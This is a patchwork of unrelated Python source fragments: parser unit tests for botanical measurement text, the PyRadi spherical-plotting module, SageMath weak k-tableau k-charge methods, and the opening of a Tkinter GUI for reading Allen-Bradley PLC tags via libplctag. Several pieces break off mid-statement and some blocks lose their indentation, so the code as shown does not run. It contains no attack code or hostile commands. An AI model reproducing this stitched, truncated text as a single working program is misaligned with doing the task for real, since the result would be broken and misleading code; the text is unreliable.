         'start': 14,
         'end': 18,
         'part': 'leaf'},
        {'units': 'mm', 'trait': 'units', 'start': 19, 'end': 21},
    ]
    self.assertEqual(actual, expected)
def test_size_12(self):
    """A width with parenthesized max after a lobed clause."""
    actual = test('leaf deeply to shallowly lobed, 4–5(–7) cm wide,')
    expected = [
        {'part': 'leaf', 'trait': 'part', 'start': 0, 'end': 4},
        {'subpart': 'lobe',
         'trait': 'subpart',
         'start': 25,
         'end': 30,
         'part': 'leaf'},
        {'width_low': 4.0,
         'width_high': 5.0,
         'width_max': 7.0,
         'width_units': 'cm',
         'trait': 'size',
         'start': 32,
         'end': 39,
         'part': 'leaf'},
        {'units': 'cm', 'trait': 'units', 'start': 40, 'end': 42},
        {'dimension': 'width', 'trait': 'dimension', 'start': 43, 'end': 47},
    ]
    self.assertEqual(actual, expected)
def test_size_13(self):
    """Multiline input: counts, locations, and sizes across several parts."""
    # NOTE(review): whitespace inside the triple-quoted literal is part of
    # the parsed input, so it must not be reformatted
    self.assertEqual(
        test("""
Leaves 3-foliolate, lateral pair of leaflets
deeply lobed, petiolules 2–5 mm,"""),
        [{'part': 'leaf', 'trait': 'part', 'start': 0, 'end': 6},
         {'low': 3,
          'trait': 'count',
          'start': 7,
          'end': 8,
          'part': 'leaf',
          'subpart': 'foliolate'},
         {'subpart': 'foliolate',
          'trait': 'subpart',
          'start': 9,
          'end': 18,
          'part': 'leaf'},
         {'location': 'lateral',
          'trait': 'location',
          'start': 20,
          'end': 27,
          'part': 'leaflet',
          'subpart': 'foliolate'},
         {'part': 'leaflet', 'trait': 'part', 'start': 36, 'end': 44},
         {'subpart': 'lobe',
          'trait': 'subpart',
          'start': 52,
          'end': 57,
          'part': 'leaflet'},
         {'part': 'petiolule', 'trait': 'part', 'start': 59, 'end': 69},
         {'length_low': 2.0,
          'length_high': 5.0,
          'length_units': 'mm',
          'trait': 'size',
          'start': 70,
          'end': 73,
          'part': 'petiolule',
          'subpart': 'lobe'},
         {'units': 'mm', 'trait': 'units', 'start': 74, 'end': 76}]
    )
def test_size_14(self):
    """A 'terminal' location propagates onto the following traits."""
    actual = test('terminal leaflet 3–5 cm, blade petiolule 3–12 mm,')
    expected = [
        {'location': 'terminal',
         'trait': 'location',
         'start': 0,
         'end': 8,
         'part': 'leaflet'},
        {'part': 'leaflet',
         'trait': 'part',
         'start': 9,
         'end': 16,
         'location': 'terminal'},
        {'length_low': 3.0,
         'length_high': 5.0,
         'length_units': 'cm',
         'trait': 'size',
         'start': 17,
         'end': 20,
         'location': 'terminal',
         'part': 'leaflet'},
        {'units': 'cm', 'trait': 'units', 'start': 21, 'end': 23},
        {'part': 'leaf',
         'trait': 'part',
         'start': 25,
         'end': 30,
         'location': 'terminal'},
        {'part': 'petiolule',
         'trait': 'part',
         'start': 31,
         'end': 40,
         'location': 'terminal'},
        {'length_low': 3.0,
         'length_high': 12.0,
         'length_units': 'mm',
         'trait': 'size',
         'start': 41,
         'end': 45,
         'location': 'terminal',
         'part': 'petiolule'},
        {'units': 'mm', 'trait': 'units', 'start': 46, 'end': 48},
    ]
    self.assertEqual(actual, expected)
def test_size_15(self):
    """Size trait: count with max in parentheses, plus length x width cross with min/max."""
    self.assertEqual(
        test('leaf shallowly 3–5(–7)-lobed, 5–25 × (8–)10–25(–30) cm,'),
        [{'part': 'leaf', 'trait': 'part', 'start': 0, 'end': 4},
         {'low': 3,
          'high': 5,
          'max': 7,
          'trait': 'count',
          'start': 15,
          'end': 22,
          'part': 'leaf',
          'subpart': 'lobe'},
         {'subpart': 'lobe',
          'trait': 'subpart',
          'start': 23,
          'end': 28,
          'part': 'leaf'},
         {'length_low': 5.0,
          'length_high': 25.0,
          'length_units': 'cm',
          'trait': 'size',
          'start': 30,
          'end': 34,
          'part': 'leaf',
          'subpart': 'lobe'},
         {'width_min': 8.0,
          'width_low': 10.0,
          'width_high': 25.0,
          'width_max': 30.0,
          'width_units': 'cm',
          'trait': 'size',
          'start': 37,
          'end': 51,
          'part': 'leaf',
          'subpart': 'lobe'},
         {'units': 'cm', 'trait': 'units', 'start': 52, 'end': 54}]
    )
def test_size_16(self):
    """Size trait: leading parenthetical min on a count, no part in scope."""
    self.assertEqual(
        test('(3–)5-lobed, 6–20(–30) × 6–25 cm,'),
        [{'min': 3,
          'low': 5,
          'trait': 'count',
          'start': 0,
          'end': 5,
          'subpart': 'lobe'},
         {'subpart': 'lobe', 'trait': 'subpart', 'start': 6, 'end': 11},
         {'length_low': 6.0,
          'length_high': 20.0,
          'length_max': 30.0,
          'length_units': 'cm',
          'trait': 'size',
          'start': 13,
          'end': 22,
          'subpart': 'lobe'},
         {'width_low': 6.0,
          'width_high': 25.0,
          'width_units': 'cm',
          'trait': 'size',
          'start': 25,
          'end': 29,
          'subpart': 'lobe'},
         {'units': 'cm', 'trait': 'units', 'start': 30, 'end': 32}]
    )
def test_size_17(self):
    """Size trait: 'to N' phrasing yields only a high value."""
    self.assertEqual(
        test('petiole to 11 cm;'),
        [{'part': 'petiole', 'trait': 'part', 'start': 0, 'end': 7},
         {'length_high': 11.0,
          'length_units': 'cm',
          'trait': 'size',
          'start': 11,
          'end': 13,
          'part': 'petiole'},
         {'units': 'cm', 'trait': 'units', 'start': 14, 'end': 16}]
    )
def test_size_18(self):
    """Size trait: sex qualifiers ('pistillate'/'staminate') attached to each size."""
    self.assertEqual(
        test('petals (1–)3–10(–12) mm (pistillate) or 5–8(–10) mm (staminate)'),
        [{'part': 'petal', 'trait': 'part', 'start': 0, 'end': 6,
          'sex': 'pistillate'},
         {'length_min': 1.0,
          'length_low': 3.0,
          'length_high': 10.0,
          'length_max': 12.0,
          'length_units': 'mm',
          'sex': 'pistillate',
          'trait': 'size',
          'start': 7,
          'end': 20,
          'part': 'petal'},
         {'units': 'mm', 'trait': 'units', 'start': 21, 'end': 23},
         {'sex': 'pistillate', 'trait': 'sex', 'start': 24, 'end': 36,
          'part': 'petal'},
         {'length_low': 5.0,
          'length_high': 8.0,
          'length_max': 10.0,
          'length_units': 'mm',
          'sex': 'staminate',
          'trait': 'size',
          'start': 40,
          'end': 48,
          'part': 'petal'},
         {'units': 'mm', 'trait': 'units', 'start': 49, 'end': 51},
         {'sex': 'staminate', 'trait': 'sex', 'start': 52, 'end': 63,
          'part': 'petal'}]
    )
def test_size_19(self):
    """Size trait: 'diam.' keyword turns length fields into diameter fields."""
    self.assertEqual(
        test('Flowers 5–10 cm diam.; hypanthium 4–8 mm,'),
        [{'part': 'flower', 'trait': 'part', 'start': 0, 'end': 7},
         {'diameter_low': 5.0,
          'diameter_high': 10.0,
          'diameter_units': 'cm',
          'trait': 'size',
          'start': 8,
          'end': 12,
          'part': 'flower'},
         {'units': 'cm', 'trait': 'units', 'start': 13, 'end': 15},
         {'dimension': 'diameter',
          'trait': 'dimension',
          'start': 16,
          'end': 20},
         {'part': 'hypanthium', 'trait': 'part', 'start': 23, 'end': 33},
         {'length_low': 4.0,
          'length_high': 8.0,
          'length_units': 'mm',
          'trait': 'size',
          'start': 34,
          'end': 37,
          'part': 'hypanthium'},
         {'units': 'mm', 'trait': 'units', 'start': 38, 'end': 40}]
    )
def test_size_20(self):
    """Size trait: double-hyphen ranges and a length x width cross."""
    self.assertEqual(
        test('Flowers 5--16 × 4--12 cm'),
        [{'part': 'flower', 'trait': 'part', 'start': 0, 'end': 7},
         {'length_low': 5.0,
          'length_high': 16.0,
          'length_units': 'cm',
          'trait': 'size',
          'start': 8,
          'end': 13,
          'part': 'flower'},
         {'width_low': 4.0,
          'width_high': 12.0,
          'width_units': 'cm',
          'trait': 'size',
          'start': 16,
          'end': 21,
          'part': 'flower'},
         {'units': 'cm', 'trait': 'units', 'start': 22, 'end': 24}]
    )
def test_size_21(self):
self.assertEqual(
test("""
Inflorescences formed season before flowering and exposed
during winter; staminate catkins 3--8.5 cm,"""),
[{'part': 'inflorescence',
'trait': 'part',
'start': 0,
'end': 14,
'sex': 'staminate'},
{'sex': 'staminate', 'trait': 'sex', 'start': 73, 'end': 82,
'part': 'catkin'},
{'part': 'catkin',
'trait': 'part',
'start': 83,
'end': 90,
'sex': 'staminate'},
{'length_low': 3.0,
'length_high': 8.5,
'length_units': 'cm',
'trait': 'size',
'start': | |
# $Id$
# $HeadURL$
################################################################
# The contents of this file are subject to the BSD 3Clause (New) License
# you may not use this file except in
# compliance with the License. You may obtain a copy of the License at
# http://directory.fsf.org/wiki/License:BSD_3Clause
# Software distributed under the License is distributed on an "AS IS"
# basis, WITHOUT WARRANTY OF ANY KIND, either express or implied. See the
# License for the specific language governing rights and limitations
# under the License.
# The Original Code is part of the PyRadi toolkit.
# The Initial Developer of the Original Code is <NAME>,
# Portions created by <NAME> are Copyright (C) 2006-2012
# All Rights Reserved.
# Contributor(s): ______________________________________.
################################################################
"""
Mayavi appears to be now available for Python 3.5 (but not 3.6) on the menpo repo:
https://anaconda.org/menpo/mayavi
conda install -c menpo mayavi=4.5.0
Please note that all mayavi-based code has been commented out.
This is because Mayavi is (1) not available in Anaconda and (2) not
yet ported to Python 3. This capability might be brought back if
there is a need.
This module provides tools for creating and viewing spherical plots.
The spherical plotting tool, using Mayavi, requires two sets of data
in order to create the spherical plot: the vertex locations in (x,y,z)
and the spatial relationship between the vertices, i.e. triangulation of
nearest neighbours. This spatial relationship is required to create
surface elements between the vertices. If the spatial relationship
is not known, the data is merely a cloud of points, with no surface
content.
The easiest way to create the spatial relationships between the vertices
was to use a convex hull polygon model of an object. The polygon or
wireframe model has the required vertices and spatial relationships.
In the original application of this tool, a series of spheres were created
using MeshLab. The essential property of these spheres was that the vertices
on the surface of the spheres were spaced equidistant over the surface, i.e.
an optimal spatial sampling distribution. The files were exported as OFF
files, and should be in the pyradi data/plotspherical directory.
There are 6 possible input files, each with different number of samples
on the unit sphere: 12, 42, 162, 642, 2562 or 10242.
Any object, with the required vertices and spatial relationships, can
be used. It does not have to be an equi-sampled sphere.
Note that the spherical plot has no way to discriminate between negative
values and a pi phase shift: there is confusion between sign and
direction. This is inherent in the conversion between cartesian
and spherical coordinates. The user has to make provision for this,
possibly by plotting only negative or only positive values.
The data must be in the OFF wireframe format.
There are two possible trajectory file types:
* 'Rotate' Stationary sensor and object with the target rotating.
In this case the trajectory file specifies the target trajectory.
* 'Orbit' Stationary object with orbiting sensor.
In this case the trajectory file specifies the sensor trajectory.
The sphere data available in pyradi/data/plotspherical are:
=============== =========== ============== ===============
Filename Resolution Number Number
. (degrees) points triangles
=============== =========== ============== ===============
sphere_0_12 63.4 12 20
sphere_1_42 33.9 42 80
sphere_2_162 17.2 162 320
sphere_3_642 8.6 642 1280
sphere_4_2562 4.32 2562 5120
sphere_5_10242 2.16 10242 20480
sphere_6_40962 1.08 40962 81920
sphere_7_163842 0.54 163842 327680
=============== =========== ============== ===============
The workflow is as follows:
#. Use writeOSSIMTrajOFFFile (or your own equivalent) to
calculate the appropriate trajectory file.
At the same time, there are two additional files created
(vertices and triangles) - keep these safe.
#. Create your data set (e.g. run simulation) using the trajectory
file. Collect the simulation data in a format for plotting.
#. Use the simulation data, together with the triangles and
vertices file, to plot the data. The triangles and vertices
are required to set up the plotting environment; consider this
the three-dimensional 'grid', while the simulation data
provides the data to be plotted in this grid.
This tool was originally developed to create trajectory files for the
Denel/CSIR OSSIM simulation. The code was restructured for greater
universal application, but the final example is still an OSSIM case.
See the __main__ function for examples of use.
This package was partly developed to provide additional material in support of students
and readers of the book Electro-Optical System Analysis and Design: A Radiometry
Perspective, <NAME>, ISBN 9780819495693, SPIE Monograph Volume
PM236, SPIE Press, 2013. http://spie.org/x648.html?product_id=2021423&origin_id=x646
"""
# module metadata: the version string is expanded by SVN keyword substitution
__version__= "$Revision$"
__author__= 'pyradi team'
# names exported by 'from ... import *'; the public API of this module
__all__= ['readOffFile', 'getRotateFromOffFile', 'getOrbitFromOffFile',
    'writeOSSIMTrajOFFFile',
    'writeOSSIMTrajElevAzim', 'getOrbitFromElevAzim','getRotateFromElevAzim',
    'plotSpherical', 'plotOSSIMSpherical',
    'sphericalPlotElevAzim', 'polarPlotElevAzim',
    'globePlotElevAzim','plotVertexSphere',]
import sys
# if sys.version_info[0] > 2:
# print("pyradi is not yet ported to Python 3, because imported modules are not yet ported")
# exit(-1)
import os.path, fnmatch
import numpy as np
from scipy.interpolate import interp1d
#mayavi commented out
#from mayavi import mlab
##############################################################################
##
def readOffFile(filename):
    """Reads an OFF file and returns the vertices and triangles in numpy arrays.

    The OFF file is read and the data captured in the array structures.
    This is a fairly trivial reading task.

    Args:
        | filename (string): name of the OFF file

    Returns:
        | vertices(np.array([])): array of vertices as [x y z]
        | triangles(np.array([])): array of triangles as []
        | Both are None if the file is not a valid OFF file.

    Raises:
        | No exception is raised.
    """
    with open(filename) as f:
        lines = f.readlines()

    # first line [0] must contain the word OFF to identify the format
    if lines[0].find('OFF') < 0:
        print('not an OFF file')
        return (None, None)

    # second line [1] has counts for vertices, faces and edges
    counts = lines[1].split()
    vertexCount = int(counts[0])
    faceCount = int(counts[1])
    edgeCount = int(counts[2])
    print('vertexCount={0} faceCount={1} edgeCount={2}'.format(vertexCount,
        faceCount, edgeCount))

    # estimate the sampling density: surface area of the unit sphere (4*pi)
    # divided by the number of faces gives the area per face; treating the
    # face as a right triangle yields a linear size, which for a unit sphere
    # approximates the angular resolution.
    # Bug fix: the previous code used 4*pi**2, but the area of the unit
    # sphere is 4*pi.
    areaFace = 4 * np.pi / faceCount
    sizeFace = np.sqrt(areaFace / 2)
    resAngle = sizeFace
    print('sampling density is approx {0:.2f} mrad or {1:.3f} degrees.'.format(
        1000 * resAngle, resAngle * 180 / np.pi))

    # vertices occupy lines[2] .. lines[2 + vertexCount - 1], one 'x y z' each.
    # Build the arrays in one pass (the previous np.vstack-in-a-loop was
    # quadratic, and produced a 1-D array when only one row was present).
    vertices = np.array(
        [[float(s) for s in lines[2 + i].split()] for i in range(vertexCount)])

    # faces follow the vertices; each line is 'n i0 i1 ... i(n-1)', drop the count
    triangles = np.array(
        [[int(s) for s in lines[2 + vertexCount + i].split()[1:]]
         for i in range(faceCount)], dtype='i4')

    if triangles.shape[0] != faceCount or vertices.shape[0] != vertexCount:
        return (None, None)
    return (vertices, triangles)
##############################################################################
##
def getRotateFromOffFile(filename, xPos, yPos, zPos):
    """ Reads an OFF file and returns object attitude and position.

    Calculate the pitch and yaw angles that point the object's x-axis
    along each vertex direction in the OFF file. The Euler order is
    yaw-pitch-roll with roll identically zero: yaw is defined in the xy
    plane, pitch in the xz plane and roll in the yz plane.

    The object is assumed stationary at (xPos, yPos, zPos); the returned
    position arrays have the same length as the attitude arrays, with every
    entry in an individual array equal to the given coordinate.

    Args:
        | filename (string): OFF file filename
        | xPos (double): object position on x axis
        | yPos (double): object position on y axis
        | zPos (double): object position on z axis

    Returns:
        | x(np.array()): array of x object location values
        | y(np.array()): array of y object location values
        | z(np.array()): array of z object location values
        | roll(np.array()): array of object location roll values
        | pitch(np.array()): array of object location pitch values
        | yaw(np.array()): array of object location yaw values
        | vertices(np.array([])): array of vertices as [x y z]
        | triangles(np.array([])): array of triangles as []

    Raises:
        | No exception is raised.
    """
    (vertices, triangles) = readOffFile(filename)
    if vertices is None:
        return (None, None, None, None, None, None, None, None)

    # yaw sign convention: +1 for vertices with negative y, -1 otherwise
    ysign = np.where(vertices[:, 1] < 0, 1, -1).reshape(-1, 1)
    # radial distance from the z axis, one row per vertex
    xyradial = np.sqrt(vertices[:, 0] ** 2 + vertices[:, 1] ** 2).reshape(-1, 1)
    deltaX = (-vertices[:, 0]).reshape(-1, 1)
    # guard against division by zero for vertices on the z axis: divide by 1
    # there and force cosyaw to zero for those vertices
    safeRadial = xyradial + (xyradial == 0)
    cosyaw = np.where(xyradial != 0, deltaX / safeRadial, 0.)
    yaw = ysign * np.arccos(cosyaw)
    pitch = -np.arctan2((-vertices[:, 2]).reshape(-1, 1), xyradial)
    roll = np.zeros_like(yaw)
    onesv = np.ones_like(yaw)
    return (xPos * onesv, yPos * onesv, zPos * onesv, roll, pitch, yaw,
            vertices, triangles)
##############################################################################
##
def getOrbitFromOffFile(filename, xTargPos, yTargPos, zTargPos, distance):
""" Reads an OFF | |
1)], 2: [(2, 0)]}
sage: t = WeakTableau([[None, None, 1, 1, 4], [1, 4], [3]], 3)
sage: t.dictionary_of_coordinates_at_residues(1)
{2: [(0, 2)], 3: [(0, 3), (1, 0)]}
sage: t = WeakTableau([], 3)
sage: t.dictionary_of_coordinates_at_residues(1)
{}
"""
d = {}
for r in self.residues_of_entries(v):
d[r] = []
for i in range(len(self)):
for j in range(len(self[i])):
if self[i][j]==v and (j - i)%(self.k+1) == r:
d[r]+=[(i,j)]
return d
def list_of_standard_cells(self):
    r"""
    Return a list of lists of the coordinates of the standard cells of ``self``.

    INPUT:

    - ``self`` -- a weak `k`-tableau in core representation with partition weight

    OUTPUT:

    - a list of lists of coordinates

    .. WARNING::

        This method currently only works for straight weak tableaux with partition
        weight.

    EXAMPLES::

        sage: t = WeakTableau([[1, 1, 2, 2, 3], [2, 3], [3]], 3)
        sage: t.list_of_standard_cells()
        [[(0, 1), (1, 0), (2, 0)], [(0, 0), (0, 2), (1, 1)]]
        sage: t = WeakTableau([[1, 1, 1, 2], [2, 2, 3]], 5)
        sage: t.list_of_standard_cells()
        [[(0, 2), (1, 1), (1, 2)], [(0, 1), (1, 0)], [(0, 0), (0, 3)]]
        sage: t = WeakTableau([[1, 1, 2, 3, 4, 4, 5, 5, 6], [2, 3, 5, 5, 6], [3, 4, 7], [5, 6], [6], [7]], 4)
        sage: t.list_of_standard_cells()
        [[(0, 1), (1, 0), (2, 0), (0, 5), (3, 0), (4, 0), (5, 0)], [(0, 0), (0, 2), (1, 1), (2, 1), (1, 2), (3, 1)]]

    TESTS::

        sage: t = WeakTableau([],3)
        sage: t.list_of_standard_cells()
        []
        sage: t = WeakTableau([[None, None, 2, 3, 4], [1, 4], [2]], 3)
        sage: t.list_of_standard_cells()
        Traceback (most recent call last):
        ...
        ValueError: This method only works for straight tableaux!
        sage: t = WeakTableau([[1,2],[2]], 3)
        sage: t.list_of_standard_cells()
        Traceback (most recent call last):
        ...
        ValueError: This method only works for weak tableaux with partition weight!
    """
    if self.parent()._skew:
        raise ValueError("This method only works for straight tableaux!")
    if self.weight() not in Partitions(sum(self.weight())):
        raise ValueError("This method only works for weak tableaux with partition weight!")
    if not self:
        return []
    # mu[i] is the length of the i-th standard subword (conjugate of the weight)
    mu = Partition(self.weight()).conjugate()
    # cells already consumed by previously constructed standard subwords
    already_used = []
    out = []
    for i in range(self[0].count(1)):
        # each standard subword starts from one of the 1-cells in row 0,
        # taken from right to left
        standard_cells = [(0,self[0].count(1) - i - 1)]
        r = self[0].count(1) - i - 1
        for v in range(1,mu[i]):
            # all cells containing the letter v+1, grouped by residue
            D = self.dictionary_of_coordinates_at_residues(v+1)
            # keep only residues none of whose cells were consumed already
            new_D = {a: b for (a, b) in D.items()
                     if all(x not in already_used for x in b)}
            # step to the cyclically closest available residue below r
            r = (r - min([self.k+1 - (x-r)%(self.k+1) for x in new_D]))%(self.k+1)
            # take the last (lowest) cell at that residue and mark the whole
            # residue class as used
            standard_cells.append(new_D[r][-1])
            already_used += new_D[r]
        out.append(standard_cells)
    return out
def k_charge(self, algorithm="I"):
    r"""
    Return the `k`-charge of ``self``.

    INPUT:

    - ``algorithm`` -- (default: "I") if "I", computes `k`-charge using the `I`
      algorithm, otherwise uses the `J`-algorithm

    OUTPUT:

    - a nonnegative integer

    For the definition of `k`-charge and the various algorithms to compute it see
    Section 3.3 of [LLMSSZ2013]_.

    .. SEEALSO:: :meth:`k_charge_I` and :meth:`k_charge_J`

    EXAMPLES::

        sage: t = WeakTableau([[1, 1, 2, 2, 3], [2, 3], [3]], 3)
        sage: t.k_charge()
        2
        sage: t = WeakTableau([[1, 3, 4, 5, 6], [2, 6], [4]], 3)
        sage: t.k_charge()
        8
        sage: t = WeakTableau([[1, 1, 2, 3, 4, 4, 5, 5, 6], [2, 3, 5, 5, 6], [3, 4, 7], [5, 6], [6], [7]], 4)
        sage: t.k_charge()
        12

    TESTS::

        sage: T = WeakTableaux(4, [13,9,5,3,2,1,1], [4,3,3,2,2,1,1,1])
        sage: T.cardinality()
        6
        sage: all(t.k_charge_I() == t.k_charge_J() for t in T)
        True
    """
    # dispatch: anything other than "I" selects the J-algorithm
    return self.k_charge_I() if algorithm == "I" else self.k_charge_J()
def k_charge_I(self):
    r"""
    Return the `k`-charge of ``self`` computed with the `I`-algorithm.

    For the definition of `k`-charge and the `I`-algorithm see Section 3.3
    of [LLMSSZ2013]_.

    OUTPUT:

    - a nonnegative integer

    .. SEEALSO:: :meth:`k_charge` and :meth:`k_charge_J`

    EXAMPLES::

        sage: t = WeakTableau([[1, 1, 2, 2, 3], [2, 3], [3]], 3)
        sage: t.k_charge_I()
        2
        sage: t = WeakTableau([[1, 3, 4, 5, 6], [2, 6], [4]], 3)
        sage: t.k_charge_I()
        8
        sage: t = WeakTableau([[1, 1, 2, 3, 4, 4, 5, 5, 6], [2, 3, 5, 5, 6], [3, 4, 7], [5, 6], [6], [7]], 4)
        sage: t.k_charge_I()
        12

    TESTS::

        sage: t = WeakTableau([[None, None, 1, 1, 4], [1, 4], [3]], 3)
        sage: t.k_charge_I()
        Traceback (most recent call last):
        ...
        ValueError: k-charge is not defined for skew weak tableaux
    """
    if self.parent()._skew:
        raise ValueError("k-charge is not defined for skew weak tableaux")
    total = 0
    for subword in self.list_of_standard_cells():
        # walk consecutive pairs of cells within this standard subword
        for cell, nxt in zip(subword, subword[1:]):
            if cell[1] < nxt[1]:
                # column ascent contributes 1 plus the diagonal count
                total += 1 + abs(self.parent().diag(nxt, cell))
            else:
                total -= abs(self.parent().diag(cell, nxt))
    return total
def k_charge_J(self):
    r"""
    Return the `k`-charge of ``self`` using the `J`-algorithm.

    For the definition of `k`-charge and the `J`-algorithm see Section 3.3 of [LLMSSZ2013]_.

    OUTPUT:

    - a nonnegative integer

    .. SEEALSO:: :meth:`k_charge` and :meth:`k_charge_I`

    EXAMPLES::

        sage: t = WeakTableau([[1, 1, 2, 2, 3], [2, 3], [3]], 3)
        sage: t.k_charge_J()
        2
        sage: t = WeakTableau([[1, 3, 4, 5, 6], [2, 6], [4]], 3)
        sage: t.k_charge_J()
        8
        sage: t = WeakTableau([[1, 1, 2, 3, 4, 4, 5, 5, 6], [2, 3, 5, 5, 6], [3, 4, 7], [5, 6], [6], [7]], 4)
        sage: t.k_charge_J()
        12

    TESTS::

        sage: t = WeakTableau([[None, None, 1, 1, 4], [1, 4], [3]], 3)
        sage: t.k_charge_I()
        Traceback (most recent call last):
        ...
        ValueError: k-charge is not defined for skew weak tableaux
        sage: t = WeakTableau([[1, 1, 2, 3], [2, 4, 4], [3, 6], [5]], 4, representation='bounded')
        sage: t.k_charge() == t.k_charge(algorithm = 'J')
        True
    """
    if self.parent()._skew:
        raise ValueError("k-charge is not defined for skew weak tableaux")
    stt = self.list_of_standard_cells()
    kch = 0
    for sw in stt:
        # Ji counts the descents (in circular distance) along this subword
        Ji = 0
        for i in range(len(sw)-1):
            # c is the cell just above the highest row of the subtableau
            # restricted to letters <= i+1 (see _height_of_restricted_subword)
            c = (self._height_of_restricted_subword(sw,i+2)+1,0)
            # circular distances of the current and next cell diagonals from c
            cdi = self.parent().circular_distance((-c[0])%(self.k+1),(sw[i][1]-sw[i][0])%(self.k+1))
            cdi1 = self.parent().circular_distance((-c[0])%(self.k+1),(sw[i+1][1]-sw[i+1][0])%(self.k+1))
            if (cdi > cdi1):
                Ji += 1
        # NOTE(review): this line deliberately uses `i` and `c` as left over
        # from the final pass of the inner loop (i.e. the last pair of cells).
        # It raises NameError if a standard subword has length 1 — presumably
        # that never occurs for valid input; confirm before refactoring.
        kch += Ji + self.parent().diag(sw[i+1],c)
    return kch
def _height_of_restricted_subword(self, sw, r):
r"""
Return the row of the highest addable cell of the subtableau of ``self`` with letters `\le r`
(excluding letters `r` in standard subwords before ``sw``).
Restrict the weak `k`-tableau ``self`` to letters `\le r` and remove all letters
`r` that appeared in a previous standard subword selected by
:meth:`list_of_standard_cells`.
INPUT:
- ``sw`` -- one of the subwords of standard cells of ``self``
- ``r`` -- nonnegative integer
OUTPUT:
- a nonnegative integer
EXAMPLES::
sage: t = WeakTableau([[1, 1, 2, 2, 3], [2, 3], [3]], 3)
sage: s = t.list_of_standard_cells()[0]; s
[(0, 1), (1, 0), (2, 0)]
sage: t._height_of_restricted_subword(s,2)
1
sage: t = WeakTableau([[1, 3, 4, 5, 6], [2, 6], [4]], 3)
sage: s = t.list_of_standard_cells()[0]; s
[(0, 0), (1, 0), (0, 1), (2, 0), (0, 3), (1, 1)]
sage: t._height_of_restricted_subword(s,4)
2
sage: t = WeakTableau([[1, 1, 2, 3, 4, 4, 5, 5, 6], [2, 3, 5, 5, 6], [3, 4, 7], [5, 6], [6], [7]], 4)
sage: s = t.list_of_standard_cells()[0]; s
[(0, 1), (1, 0), (2, 0), (0, 5), (3, 0), (4, 0), (5, 0)]
sage: t._height_of_restricted_subword(s,6)
4
"""
R = [v for v in self.shape().to_partition().cells() if self[v[0]][v[1]] < r]
L = [v for v in sw if self[v[0]][v[1]] <= r]
return max(v[0] for v in L+R)
class WeakTableaux_core(WeakTableaux_abstract):
r"""
The class of (skew) weak `k`-tableaux in the core representation of shape ``shape``
(as `k+1`-core) and weight ``weight``.
INPUT:
- ``k`` -- positive integer
- ``shape`` -- the shape of the `k`-tableaux represented as a `(k+1)`-core; if the
tableaux are skew, the shape is a tuple of the outer and inner shape (both as
`(k+1)`-cores)
- ``weight`` -- the weight of the `k`-tableaux
EXAMPLES::
sage: T = WeakTableaux(3, [4,1], [2,2])
sage: T.list()
[[[1, 1, 2, 2], [2]]]
sage: T = WeakTableaux(3, [[5,2,1], [2]], [1,1,1,1])
sage: T.list()
[[[None, None, 2, 3, 4], [1, 4], [2]],
[[None, None, 1, 2, 4], [2, 4], [3]],
[[None, None, 1, 2, 3], [2, 3], [4]]]
"""
@staticmethod
def __classcall_private__(cls, k, shape, weight):
r"""
Straighten arguments before unique representation.
TESTS::
sage: from sage.combinat.k_tableau import WeakTableaux_core
sage: T = WeakTableaux_core(3, [2,1], [1,1,1])
sage: TestSuite(T).run()
sage: T = WeakTableaux_core(3, [[5,2,1], [2]], [1,1,1,1])
sage: TestSuite(T).run()
"""
if shape == [] or shape[0] in ZZ:
shape = (Core(shape, k+1), Core([],k+1))
else:
shape = tuple([Core(r,k+1) for r in shape])
return super(WeakTableaux_core, | |
<filename>plctag_gui.py
'''
Create a simple Tkinter window to display fetched tags and selected tag value(s).
Tkinter doesn't come preinstalled on all Linux distributions, so you may need to install it.
For Ubuntu: sudo apt-get install python-tk
Tkinter vs tkinter
Reference: https://stackoverflow.com/questions/17843596/difference-between-tkinter-and-tkinter
Window/widget resizing
Reference: https://stackoverflow.com/questions/22835289/how-to-get-tkinter-canvas-to-dynamically-resize-to-window-width
'''
import threading
import platform
import time
import math
import re as regexp # regular expressions
from libplctag import *
try:
# Python 2
from Tkinter import *
except ImportError:
# Python 3
from tkinter import *
import tkinter.font as tkfont
pythonVersion = platform.python_version()

# if setting myTag for startup then also set the correct value of myTagDataType
currentPLC = 'controllogix'
ipAddress = '192.168.1.15'
path = '1,3'
myTag = 'CT_BOOLArray_1[0]{5}'
myTagDataType = 'bool array'
timeout = 10000

# PLC families selectable in the GUI
ab_plc_type = ['controllogix', 'micrologix', 'logixpccc', 'micro800', 'slc500', 'plc5', 'njnx']
# data types offered per PLC family
ab_data_type = ['int8', 'uint8', 'int16', 'uint16', 'int32', 'uint32', 'int64', 'uint64', 'float32', 'float64', 'bool', 'bool array', 'string', 'custom string', 'timer', 'counter', 'control']
ab_mlgx_data_type = ['int8', 'uint8', 'int16', 'uint16', 'int32', 'uint32', 'int64', 'uint64', 'float32', 'float64', 'string', 'timer', 'counter', 'control', 'pid']
ab_slcplc5_data_type = ['int8', 'uint8', 'int16', 'uint16', 'int32', 'uint32', 'int64', 'uint64','float32', 'float64', 'string', 'timer', 'counter', 'control']
# sub-element selections for the structured Timer/Counter/Control/PID types
timer_bits_words = ['None', 'EN', 'TT', 'DN', 'PRE', 'ACC']
counter_bits_words = ['None', 'CU', 'CD', 'DN', 'OV', 'UN', 'UA', 'PRE', 'ACC']
control_bits_words = ['None', 'EN', 'EU', 'DN', 'EM', 'ER', 'UL', 'IN', 'FD', 'LEN', 'POS']
pid_bits_words = ['None', 'TM', 'AM', 'CM', 'OL', 'RG', 'SC', 'TF', 'DA', 'DB', 'UL', 'LL', 'SP', 'PV', 'DN', 'EN', 'SPS', 'KC', 'Ti', 'TD', 'MAXS', 'MINS', 'ZCD', 'CVH', 'CVL', 'LUT', 'SPV', 'CVP']
# bit index choices: 'None' plus one string entry per bit. Generated instead
# of hand-typed (the previous literal lists were error-prone to maintain);
# the resulting values are identical.
bits_8bit = ['None'] + [str(b) for b in range(8)]
bits_16bit = ['None'] + [str(b) for b in range(16)]
bits_32bit = ['None'] + [str(b) for b in range(32)]
bits_64bit = ['None'] + [str(b) for b in range(64)]
# selectable custom string lengths '1' .. '50'
string_length = [str(n) for n in range(1, 51)]
# display formats offered for boolean values
bool_display = ['T : F', '1 : 0', 'On : Off']
# label whose width follows the window, re-wrapping its text on resize
class LabelResizing(Label):
    """A Label that tracks its container's width and wraps text to fit."""

    def __init__(self, parent, **kwargs):
        Label.__init__(self, parent, **kwargs)
        # start from the requested width; updated on every <Configure> event
        self.width = self.winfo_reqwidth()
        self.bind("<Configure>", self.on_resize)

    def on_resize(self, event):
        """Adopt the new widget width and wrap the label text to it."""
        if self.width <= 0:
            return
        self.width = int(event.width)
